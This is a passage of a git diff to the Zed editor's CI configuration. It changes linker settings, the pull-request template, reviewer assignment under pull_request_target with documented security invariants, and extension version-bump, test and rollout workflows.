diff --git a/.cargo/ci-config.toml b/.cargo/ci-config.toml index b31b79a59b262a5cc18cf1d2b32124a97bab4fc7..6a5feece648a39be39e99fa3eb5807713b911348 100644 --- a/.cargo/ci-config.toml +++ b/.cargo/ci-config.toml @@ -15,14 +15,4 @@ rustflags = ["-D", "warnings"] [profile.dev] debug = "limited" -# Use Mold on Linux, because it's faster than GNU ld and LLD. -# -# We no longer set this in the default `config.toml` so that developers can opt in to Wild, which -# is faster than Mold, in their own ~/.cargo/config.toml. -[target.x86_64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] -[target.aarch64-unknown-linux-gnu] -linker = "clang" -rustflags = ["-C", "link-arg=-fuse-ld=mold"] diff --git a/.cargo/config.toml b/.cargo/config.toml index 9b2e6f51c96e3ae98a54bbb11524210911d0e262..a9bf1f9cc975cf812605e88379def0ab334f76ad 100644 --- a/.cargo/config.toml +++ b/.cargo/config.toml @@ -16,5 +16,9 @@ rustflags = [ "target-feature=+crt-static", # This fixes the linking issue when compiling livekit on Windows ] +# We need lld to link libwebrtc.a successfully on aarch64-linux +[target.aarch64-unknown-linux-gnu] +rustflags = ["-C", "link-arg=-fuse-ld=lld"] + [env] MACOSX_DEPLOYMENT_TARGET = "10.15.7" diff --git a/.github/DISCUSSION_TEMPLATE/feature-requests.yml b/.github/DISCUSSION_TEMPLATE/feature-requests.yml index 183a3de934eccc8baa8428e822176e31d1d11782..e8a695063c34771ac6120b1e477b7494a17aa3c9 100644 --- a/.github/DISCUSSION_TEMPLATE/feature-requests.yml +++ b/.github/DISCUSSION_TEMPLATE/feature-requests.yml @@ -40,4 +40,4 @@ body: attributes: value: | Learn more about how feature requests work in our - [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/47963). + [Feature Request Guidelines](https://github.com/zed-industries/zed/discussions/51422). diff --git a/.github/pull_request_template.md b/.github/pull_request_template.md index 4470b5763fcf84f54ea1b0ef7c2f7bf9786eaaca..b8b7939813f9cc72da88e75653b6f2933403a239 100644 --- a/.github/pull_request_template.md +++ b/.github/pull_request_template.md @@ -1,10 +1,28 @@ -Closes #ISSUE +## Context -Before you mark this PR as ready for review, make sure that you have: -- [ ] Added a solid test coverage and/or screenshots from doing manual testing -- [ ] Done a self-review taking into account security and performance aspects -- [ ] Aligned any UI changes with the [UI checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) + + +## How to Review + + + +## Self-Review Checklist + + +- [ ] I've reviewed my own diff for quality, security, and reliability +- [ ] Unsafe blocks (if any) have justifying comments +- [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) +- [ ] Tests cover the new/changed behavior +- [ ] Performance impact has been considered and is acceptable Release Notes: -- N/A *or* Added/Fixed/Improved ... +- N/A or Added/Fixed/Improved ... diff --git a/.github/workflows/assign-reviewers.yml b/.github/workflows/assign-reviewers.yml index a77f1812d06330b4635fe173583f0f1ce93e4e17..1a21879b639736232f965863a31b9a8d3a2c2b35 100644 --- a/.github/workflows/assign-reviewers.yml +++ b/.github/workflows/assign-reviewers.yml @@ -10,25 +10,43 @@ # AUTH NOTE: Uses a GitHub App (COORDINATOR_APP_ID + COORDINATOR_APP_PRIVATE_KEY) # for all API operations: cloning the private coordinator repo, requesting team # reviewers, and setting PR assignees. GITHUB_TOKEN is not used. +# +# SECURITY INVARIANTS (pull_request_target): +# This workflow runs with access to secrets for ALL PRs including forks. +# It is safe ONLY because: +# 1. The checkout is the coordinator repo at ref: main — NEVER the PR head/branch +# 2. No ${{ }} interpolation of event fields in run: blocks — all routed via env: +# 3. The script never executes, sources, or reads files from the PR branch +# Violating any of these enables remote code execution with secret access. name: Assign Reviewers on: - pull_request: + # zizmor: ignore[dangerous-triggers] reviewed — no PR code checkout, only coordinator repo at ref: main + pull_request_target: types: [opened, ready_for_review] # GITHUB_TOKEN is not used — all operations use the GitHub App token. # Declare minimal permissions so the default token has no write access. permissions: {} -# Only run for PRs from within the org (not forks) — fork PRs don't have -# write access to request team reviewers. +# Prevent duplicate runs for the same PR (e.g., rapid push + ready_for_review). +concurrency: + group: assign-reviewers-${{ github.event.pull_request.number }} + cancel-in-progress: true + +# NOTE: For ready_for_review events, the webhook payload may still carry +# draft: true due to a GitHub race condition (payload serialized before DB +# update). We trust the event type instead — the script rechecks draft status +# via a live API call as defense-in-depth. +# +# No author_association filter — external and fork PRs also get reviewer +# assignments. Assigned reviewers are inherently scoped to org team members +# by the GitHub Teams API. jobs: assign-reviewers: if: >- - github.event.pull_request.head.repo.full_name == github.repository && - github.event.pull_request.draft == false && - contains(fromJSON('["MEMBER", "OWNER"]'), github.event.pull_request.author_association) + github.event.action == 'ready_for_review' || github.event.pull_request.draft == false runs-on: ubuntu-latest steps: - name: Generate app token @@ -39,6 +57,8 @@ jobs: private-key: ${{ secrets.COORDINATOR_APP_PRIVATE_KEY }} repositories: codeowner-coordinator,zed + # SECURITY: checks out the coordinator repo at ref: main, NOT the PR branch. + # persist-credentials: false prevents the token from leaking into .git/config. - name: Checkout coordinator repo uses: actions/checkout@34e114876b0b11c390a56381ad16ebd13914f8d5 # v4.3.1 with: @@ -54,7 +74,9 @@ jobs: python-version: "3.11" - name: Install dependencies - run: pip install pyyaml==6.0.3 + run: | + pip install --no-deps -q --only-binary ':all:' \ + -r /dev/stdin <<< "pyyaml==6.0.3 --hash=sha256:b8bb0864c5a28024fac8a632c443c87c5aa6f215c0b126c449ae1a150412f31d" - name: Assign reviewers env: @@ -69,7 +91,6 @@ jobs: --rules-file team-membership-rules.yml \ --repo "$TARGET_REPO" \ --org zed-industries \ - --min-association member \ 2>&1 | tee /tmp/assign-reviewers-output.txt - name: Upload output diff --git a/.github/workflows/autofix_pr.yml b/.github/workflows/autofix_pr.yml index 1fa271d168a8c3d1744439647ff50b793a854d1d..1f9e6320700d14cab69662e317c30fa7206eb655 100644 --- a/.github/workflows/autofix_pr.yml +++ b/.github/workflows/autofix_pr.yml @@ -37,8 +37,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::setup_pnpm diff --git a/.github/workflows/bump_patch_version.yml b/.github/workflows/bump_patch_version.yml index 480d8b0ada98e859d2e72b49a39805ffe8f72b25..62540321ed755f2fd3879a7ddfc3a37237d8e7de 100644 --- a/.github/workflows/bump_patch_version.yml +++ b/.github/workflows/bump_patch_version.yml @@ -23,8 +23,8 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false - token: ${{ steps.get-app-token.outputs.token }} ref: ${{ inputs.branch }} + token: ${{ steps.get-app-token.outputs.token }} - name: bump_patch_version::run_bump_patch_version::bump_patch_version run: | channel="$(cat crates/zed/RELEASE_CHANNEL)" diff --git a/.github/workflows/compare_perf.yml b/.github/workflows/compare_perf.yml index f7d78dbbf6a6d04bc47212b6842f894850288fcc..03113f2aa0be4dc794f8f5edec18df22fb0daa31 100644 --- a/.github/workflows/compare_perf.yml +++ b/.github/workflows/compare_perf.yml @@ -30,8 +30,6 @@ jobs: cp ./.cargo/ci-config.toml ./../.cargo/config.toml - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: compare_perf::run_perf::install_hyperfine diff --git a/.github/workflows/deploy_collab.yml b/.github/workflows/deploy_collab.yml index 89fb6980b65f2d09a6571f140ab016a710be230f..7fe06460f752599513c79b71bb01636d69d20e6c 100644 --- a/.github/workflows/deploy_collab.yml +++ b/.github/workflows/deploy_collab.yml @@ -12,6 +12,9 @@ jobs: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') name: Check formatting and Clippy lints runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 @@ -29,8 +32,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_fmt @@ -42,6 +43,9 @@ jobs: - style name: Run tests runs-on: namespace-profile-16x32-ubuntu-2204 + env: + CC: clang + CXX: clang++ steps: - name: steps::checkout_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 @@ -59,8 +63,6 @@ jobs: path: ~/.rustup - name: steps::setup_linux run: ./script/linux - - name: steps::install_mold - run: ./script/install-mold - name: steps::download_wasi_sdk run: ./script/download-wasi-sdk - name: steps::cargo_install_nextest diff --git a/.github/workflows/extension_auto_bump.yml b/.github/workflows/extension_auto_bump.yml new file mode 100644 index 0000000000000000000000000000000000000000..9388a0a442bf249505aaf51e9b6826d3bb228fb7 --- /dev/null +++ b/.github/workflows/extension_auto_bump.yml @@ -0,0 +1,74 @@ +# Generated from xtask::workflows::extension_auto_bump +# Rebuild with `cargo xtask workflows`. +name: extension_auto_bump +on: + push: + branches: + - main + paths: + - extensions/** + - '!extensions/slash-commands-example/**' + - '!extensions/test-extension/**' + - '!extensions/workflows/**' + - '!extensions/*.md' +jobs: + detect_changed_extensions: + if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') + runs-on: namespace-profile-2x4-ubuntu-2404 + steps: + - name: steps::checkout_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + fetch-depth: 2 + - id: detect + name: extension_auto_bump::detect_changed_extensions + run: | + COMPARE_REV="$(git rev-parse HEAD~1)" + CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # Detect changed extension directories (excluding extensions/workflows) + CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true) + if [ -n "$CHANGED_EXTENSIONS" ]; then + EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))') + else + EXTENSIONS_JSON="[]" + fi + # Filter out newly added or entirely removed extensions + FILTERED="[]" + for ext in $(echo "$EXTENSIONS_JSON" | jq -r '.[]'); do + if git show HEAD~1:"$ext/extension.toml" >/dev/null 2>&1 && \ + [ -f "$ext/extension.toml" ]; then + FILTERED=$(echo "$FILTERED" | jq -c --arg e "$ext" '. + [$e]') + fi + done + echo "changed_extensions=$FILTERED" >> "$GITHUB_OUTPUT" + outputs: + changed_extensions: ${{ steps.detect.outputs.changed_extensions }} + timeout-minutes: 5 + bump_extension_versions: + needs: + - detect_changed_extensions + if: needs.detect_changed_extensions.outputs.changed_extensions != '[]' + permissions: + actions: write + contents: write + issues: write + pull-requests: write + strategy: + matrix: + extension: ${{ fromJson(needs.detect_changed_extensions.outputs.changed_extensions) }} + fail-fast: false + max-parallel: 1 + uses: ./.github/workflows/extension_bump.yml + secrets: + app-id: ${{ secrets.ZED_ZIPPY_APP_ID }} + app-secret: ${{ secrets.ZED_ZIPPY_APP_PRIVATE_KEY }} + with: + working-directory: ${{ matrix.extension }} + force-bump: false +concurrency: + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + cancel-in-progress: true +defaults: + run: + shell: bash -euxo pipefail {0} diff --git a/.github/workflows/extension_bump.yml b/.github/workflows/extension_bump.yml index 9cc53741e8007a1b3ddd02ad07b191b3ce171cc8..cbe38ee9e5b958eeee80eb5576c93896cc6763e1 100644 --- a/.github/workflows/extension_bump.yml +++ b/.github/workflows/extension_bump.yml @@ -17,6 +17,10 @@ on: description: force-bump required: true type: boolean + working-directory: + description: working-directory + type: string + default: . secrets: app-id: description: The app ID used to create the PR @@ -42,8 +46,6 @@ jobs: if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -59,6 +61,10 @@ jobs: version_changed: ${{ steps.compare-versions-check.outputs.version_changed }} current_version: ${{ steps.compare-versions-check.outputs.current_version }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} bump_extension_version: needs: - check_version_changed @@ -77,6 +83,11 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup - name: extension_bump::install_bump_2_version run: pip install bump2version --break-system-packages - id: bump-version @@ -94,29 +105,56 @@ jobs: --no-configured-files "$BUMP_TYPE" "${BUMP_FILES[@]}" if [[ -f "Cargo.toml" ]]; then - cargo update --workspace + cargo +stable update --workspace fi NEW_VERSION="$(sed -n 's/^version = \"\(.*\)\"/\1/p' < extension.toml | tr -d '[:space:]')" + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + EXTENSION_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + { + echo "title=Bump version to ${NEW_VERSION}"; + echo "body=This PR bumps the version of this extension to v${NEW_VERSION}"; + echo "branch_name=zed-zippy-autobump"; + } >> "$GITHUB_OUTPUT" + else + { + echo "title=${EXTENSION_ID}: Bump to v${NEW_VERSION}"; + echo "body<> "$GITHUB_OUTPUT" + fi echo "new_version=${NEW_VERSION}" >> "$GITHUB_OUTPUT" env: OLD_VERSION: ${{ needs.check_version_changed.outputs.current_version }} BUMP_TYPE: ${{ inputs.bump-type }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_pull_request uses: peter-evans/create-pull-request@v7 with: - title: Bump version to ${{ steps.bump-version.outputs.new_version }} - body: This PR bumps the version of this extension to v${{ steps.bump-version.outputs.new_version }} - commit-message: Bump version to v${{ steps.bump-version.outputs.new_version }} - branch: zed-zippy-autobump + title: ${{ steps.bump-version.outputs.title }} + body: ${{ steps.bump-version.outputs.body }} + commit-message: ${{ steps.bump-version.outputs.title }} + branch: ${{ steps.bump-version.outputs.branch_name }} committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com> base: main delete-branch: true token: ${{ steps.generate-token.outputs.token }} sign-commits: true assignees: ${{ github.actor }} - timeout-minutes: 3 + timeout-minutes: 5 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} create_version_label: needs: - check_version_changed @@ -133,6 +171,21 @@ jobs: uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false + - id: determine-tag + name: extension_bump::determine_tag + run: | + EXTENSION_ID="$(sed -n 's/^id = "\(.*\)"/\1/p' < extension.toml | head -1 | tr -d '[:space:]')" + + if [[ "$WORKING_DIR" == "." || -z "$WORKING_DIR" ]]; then + TAG="v${CURRENT_VERSION}" + else + TAG="${EXTENSION_ID}-v${CURRENT_VERSION}" + fi + + echo "tag=${TAG}" >> "$GITHUB_OUTPUT" + env: + CURRENT_VERSION: ${{ needs.check_version_changed.outputs.current_version }} + WORKING_DIR: ${{ inputs.working-directory }} - name: extension_bump::create_version_tag uses: actions/github-script@v7 with: @@ -140,11 +193,17 @@ jobs: github.rest.git.createRef({ owner: context.repo.owner, repo: context.repo.repo, - ref: 'refs/tags/v${{ needs.check_version_changed.outputs.current_version }}', + ref: 'refs/tags/${{ steps.determine-tag.outputs.tag }}', sha: context.sha }) github-token: ${{ steps.generate-token.outputs.token }} + outputs: + tag: ${{ steps.determine-tag.outputs.tag }} timeout-minutes: 1 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} trigger_release: needs: - check_version_changed @@ -170,16 +229,85 @@ jobs: EXTENSION_ID="$(sed -n 's/id = \"\(.*\)\"/\1/p' < extension.toml)" echo "extension_id=${EXTENSION_ID}" >> "$GITHUB_OUTPUT" - - name: extension_bump::release_action - uses: huacnlee/zed-extension-action@v2 + - id: extension-update + name: extension_bump::release_action + uses: huacnlee/zed-extension-action@82920ff0876879f65ffbcfa3403589114a8919c6 with: extension-name: ${{ steps.get-extension-id.outputs.extension_id }} push-to: zed-industries/extensions - tag: v${{ needs.check_version_changed.outputs.current_version }} + tag: ${{ needs.create_version_label.outputs.tag }} env: COMMITTER_TOKEN: ${{ steps.generate-token.outputs.token }} + - name: extension_bump::enable_automerge_if_staff + uses: actions/github-script@v7 + with: + github-token: ${{ steps.generate-token.outputs.token }} + script: | + const prNumber = process.env.PR_NUMBER; + if (!prNumber) { + console.log('No pull request number set, skipping automerge.'); + return; + } + + const author = process.env.GITHUB_ACTOR; + let isStaff = false; + try { + const response = await github.rest.teams.getMembershipForUserInOrg({ + org: 'zed-industries', + team_slug: 'staff', + username: author + }); + isStaff = response.data.state === 'active'; + } catch (error) { + if (error.status !== 404) { + throw error; + } + } + + if (!isStaff) { + console.log(`Actor ${author} is not a staff member, skipping automerge.`); + return; + } + + // Assign staff member responsible for the bump + const pullNumber = parseInt(prNumber); + + await github.rest.issues.addAssignees({ + owner: 'zed-industries', + repo: 'extensions', + issue_number: pullNumber, + assignees: [author] + }); + console.log(`Assigned ${author} to PR #${prNumber} in zed-industries/extensions`); + + // Get the GraphQL node ID + const { data: pr } = await github.rest.pulls.get({ + owner: 'zed-industries', + repo: 'extensions', + pull_number: pullNumber + }); + + await github.graphql(` + mutation($pullRequestId: ID!) { + enablePullRequestAutoMerge(input: { pullRequestId: $pullRequestId, mergeMethod: SQUASH }) { + pullRequest { + autoMergeRequest { + enabledAt + } + } + } + } + `, { pullRequestId: pr.node_id }); + + console.log(`Automerge enabled for PR #${prNumber} in zed-industries/extensions`); + env: + PR_NUMBER: ${{ steps.extension-update.outputs.pull-request-number }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-bump cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_tests.yml b/.github/workflows/extension_tests.yml index 53de373c1b79dc3ca9a3637642e10998c781580a..89668c028a6d1fa4baddd417687226dd55a52426 100644 --- a/.github/workflows/extension_tests.yml +++ b/.github/workflows/extension_tests.yml @@ -9,7 +9,12 @@ env: RUSTUP_TOOLCHAIN: stable CARGO_BUILD_TARGET: wasm32-wasip2 on: - workflow_call: {} + workflow_call: + inputs: + working-directory: + description: working-directory + type: string + default: . jobs: orchestrate: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') @@ -34,6 +39,14 @@ jobs: fi CHANGED_FILES="$(git diff --name-only "$COMPARE_REV" "$GITHUB_SHA")" + # When running from a subdirectory, git diff returns repo-root-relative paths. + # Filter to only files within the current working directory and strip the prefix. + REPO_SUBDIR="$(git rev-parse --show-prefix)" + REPO_SUBDIR="${REPO_SUBDIR%/}" + if [ -n "$REPO_SUBDIR" ]; then + CHANGED_FILES="$(echo "$CHANGED_FILES" | grep "^${REPO_SUBDIR}/" | sed "s|^${REPO_SUBDIR}/||" || true)" + fi + check_pattern() { local output_name="$1" local pattern="$2" @@ -49,6 +62,10 @@ jobs: outputs: check_rust: ${{ steps.filter.outputs.check_rust }} check_extension: ${{ steps.filter.outputs.check_extension }} + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_rust: needs: - orchestrate @@ -66,17 +83,31 @@ jobs: path: ~/.rustup - name: extension_tests::install_rust_target run: rustup target add wasm32-wasip2 - - name: steps::cargo_fmt - run: cargo fmt --all -- --check + - id: get-package-name + name: extension_tests::get_package_name + run: | + PACKAGE_NAME="$(sed -n 's/^name = "\(.*\)"/\1/p' < Cargo.toml | head -1 | tr -d '[:space:]')" + echo "package_name=${PACKAGE_NAME}" >> "$GITHUB_OUTPUT" + - name: extension_tests::cargo_fmt_package + run: cargo fmt -p "$PACKAGE_NAME" -- --check + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: extension_tests::run_clippy - run: cargo clippy --release --all-features -- --deny warnings + run: cargo clippy -p "$PACKAGE_NAME" --release --all-features -- --deny warnings + env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} - name: steps::cargo_install_nextest uses: taiki-e/install-action@nextest - - name: steps::cargo_nextest - run: 'cargo nextest run --workspace --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' + - name: extension_tests::run_nextest + run: 'cargo nextest run -p "$PACKAGE_NAME" --no-fail-fast --no-tests=warn --target "$(rustc -vV | sed -n ''s|host: ||p'')"' env: + PACKAGE_NAME: ${{ steps.get-package-name.outputs.package_name }} NEXTEST_NO_TESTS: warn timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} check_extension: needs: - orchestrate @@ -97,8 +128,8 @@ jobs: - name: extension_tests::download_zed_extension_cli if: steps.cache-zed-extension-cli.outputs.cache-hit != 'true' run: | - wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" - chmod +x zed-extension + wget --quiet "https://zed-extension-cli.nyc3.digitaloceanspaces.com/$ZED_EXTENSION_CLI_SHA/x86_64-unknown-linux-gnu/zed-extension" -O "$GITHUB_WORKSPACE/zed-extension" + chmod +x "$GITHUB_WORKSPACE/zed-extension" - name: steps::cache_rust_dependencies_namespace uses: namespacelabs/nscloud-cache-action@v1 with: @@ -108,7 +139,7 @@ jobs: run: | mkdir -p /tmp/ext-scratch mkdir -p /tmp/ext-output - ./zed-extension --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output + "$GITHUB_WORKSPACE/zed-extension" --source-dir . --scratch-dir /tmp/ext-scratch --output-dir /tmp/ext-output - name: run_tests::fetch_ts_query_ls uses: dsaltares/fetch-gh-release-asset@aa37ae5c44d3c9820bc12fe675e8670ecd93bd1c with: @@ -117,8 +148,8 @@ jobs: file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - name: run_tests::run_ts_query_ls run: |- - tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz - ./ts_query_ls format --check . || { + tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE" + "$GITHUB_WORKSPACE/ts_query_ls" format --check . || { echo "Found unformatted queries, please format them with ts_query_ls." echo "For easy use, install the Tree-sitter query extension:" echo "zed://extension/tree-sitter-query" @@ -132,8 +163,6 @@ jobs: if [[ "$GITHUB_EVENT_NAME" == "pull_request" ]]; then PR_FORK_POINT="$(git merge-base origin/main HEAD)" git checkout "$PR_FORK_POINT" - elif BRANCH_PARENT_SHA="$(git merge-base origin/main origin/zed-zippy-autobump)"; then - git checkout "$BRANCH_PARENT_SHA" else git checkout "$(git log -1 --format=%H)"~1 fi @@ -156,6 +185,10 @@ jobs: VERSION_CHANGED: ${{ steps.compare-versions-check.outputs.version_changed }} PR_USER_LOGIN: ${{ github.event.pull_request.user.login }} timeout-minutes: 6 + defaults: + run: + shell: bash -euxo pipefail {0} + working-directory: ${{ inputs.working-directory }} tests_pass: needs: - orchestrate @@ -184,7 +217,7 @@ jobs: RESULT_CHECK_RUST: ${{ needs.check_rust.result }} RESULT_CHECK_EXTENSION: ${{ needs.check_extension.result }} concurrency: - group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }} + group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}extension-tests cancel-in-progress: true defaults: run: diff --git a/.github/workflows/extension_workflow_rollout.yml b/.github/workflows/extension_workflow_rollout.yml index 9bfac06d4527985553ba3d04e64c656ee5bf85e4..f695b43ecac47a221bbc795d03e6ddd6259d7014 100644 --- a/.github/workflows/extension_workflow_rollout.yml +++ b/.github/workflows/extension_workflow_rollout.yml @@ -4,12 +4,57 @@ name: extension_workflow_rollout env: CARGO_TERM_COLOR: always on: - workflow_dispatch: {} + workflow_dispatch: + inputs: + filter-repos: + description: Comma-separated list of repository names to rollout to. Leave empty for all repos. + type: string + default: '' + change-description: + description: Description for the changes to be expected with this rollout + type: string + default: '' jobs: fetch_extension_repos: if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && github.ref == 'refs/heads/main' runs-on: namespace-profile-2x4-ubuntu-2404 steps: + - name: checkout_zed_repo + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 + with: + clean: false + fetch-depth: 0 + - id: prev-tag + name: extension_workflow_rollout::fetch_extension_repos::get_previous_tag_commit + run: | + PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") + if [ -z "$PREV_COMMIT" ]; then + echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." + exit 1 + fi + echo "Found previous rollout at commit: $PREV_COMMIT" + echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" + - id: calc-changes + name: extension_workflow_rollout::fetch_extension_repos::get_removed_files + run: | + for workflow_type in "ci" "shared"; do + if [ "$workflow_type" = "ci" ]; then + WORKFLOW_DIR="extensions/workflows" + else + WORKFLOW_DIR="extensions/workflows/shared" + fi + + REMOVED=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ + awk '/^D/ { print $2 } /^R/ { print $2 }' | \ + xargs -I{} basename {} 2>/dev/null | \ + tr '\n' ' ' || echo "") + REMOVED=$(echo "$REMOVED" | xargs) + + echo "Removed files for $workflow_type: $REMOVED" + echo "removed_${workflow_type}=$REMOVED" >> "$GITHUB_OUTPUT" + done + env: + PREV_COMMIT: ${{ steps.prev-tag.outputs.prev_commit }} - id: list-repos name: extension_workflow_rollout::fetch_extension_repos::get_repositories uses: actions/github-script@v7 @@ -21,16 +66,42 @@ jobs: per_page: 100, }); - const filteredRepos = repos + let filteredRepos = repos .filter(repo => !repo.archived) .map(repo => repo.name); + const filterInput = `${{ inputs.filter-repos }}`.trim(); + if (filterInput.length > 0) { + const allowedNames = filterInput.split(',').map(s => s.trim()).filter(s => s.length > 0); + filteredRepos = filteredRepos.filter(name => allowedNames.includes(name)); + console.log(`Filter applied. Matched ${filteredRepos.length} repos from ${allowedNames.length} requested.`); + } + console.log(`Found ${filteredRepos.length} extension repos`); return filteredRepos; result-encoding: json + - name: steps::cache_rust_dependencies_namespace + uses: namespacelabs/nscloud-cache-action@v1 + with: + cache: rust + path: ~/.rustup + - name: extension_workflow_rollout::fetch_extension_repos::generate_workflow_files + run: | + cargo xtask workflows "$COMMIT_SHA" + env: + COMMIT_SHA: ${{ github.sha }} + - name: extension_workflow_rollout::fetch_extension_repos::upload_workflow_files + uses: actions/upload-artifact@330a01c490aca151604b8cf639adc76d48f6c5d4 + with: + name: extension-workflow-files + path: extensions/workflows/**/*.yml + if-no-files-found: error outputs: repos: ${{ steps.list-repos.outputs.result }} - timeout-minutes: 5 + prev_commit: ${{ steps.prev-tag.outputs.prev_commit }} + removed_ci: ${{ steps.calc-changes.outputs.removed_ci }} + removed_shared: ${{ steps.calc-changes.outputs.removed_shared }} + timeout-minutes: 10 rollout_workflows_to_extension: needs: - fetch_extension_repos @@ -53,59 +124,28 @@ jobs: permission-pull-requests: write permission-contents: write permission-workflows: write - - name: checkout_zed_repo - uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 - with: - clean: false - fetch-depth: 0 - path: zed - name: checkout_extension_repo uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 with: clean: false - token: ${{ steps.generate-token.outputs.token }} path: extension repository: zed-extensions/${{ matrix.repo }} - - id: prev-tag - name: extension_workflow_rollout::rollout_workflows_to_extension::get_previous_tag_commit - run: | - PREV_COMMIT=$(git rev-parse "extension-workflows^{commit}" 2>/dev/null || echo "") - if [ -z "$PREV_COMMIT" ]; then - echo "::error::No previous rollout tag 'extension-workflows' found. Cannot determine file changes." - exit 1 - fi - echo "Found previous rollout at commit: $PREV_COMMIT" - echo "prev_commit=$PREV_COMMIT" >> "$GITHUB_OUTPUT" - working-directory: zed - - id: calc-changes - name: extension_workflow_rollout::rollout_workflows_to_extension::get_removed_files + token: ${{ steps.generate-token.outputs.token }} + - name: extension_workflow_rollout::rollout_workflows_to_extension::download_workflow_files + uses: actions/download-artifact@018cc2cf5baa6db3ef3c5f8a56943fffe632ef53 + with: + name: extension-workflow-files + path: workflow-files + - name: extension_workflow_rollout::rollout_workflows_to_extension::sync_workflow_files run: | + mkdir -p extension/.github/workflows + if [ "$MATRIX_REPO" = "workflows" ]; then - WORKFLOW_DIR="extensions/workflows" + REMOVED_FILES="$REMOVED_CI" else - WORKFLOW_DIR="extensions/workflows/shared" + REMOVED_FILES="$REMOVED_SHARED" fi - echo "Calculating changes from $PREV_COMMIT to HEAD for $WORKFLOW_DIR" - - # Get deleted files (status D) and renamed files (status R - old name needs removal) - # Using -M to detect renames, then extracting files that are gone from their original location - REMOVED_FILES=$(git diff --name-status -M "$PREV_COMMIT" HEAD -- "$WORKFLOW_DIR" | \ - awk '/^D/ { print $2 } 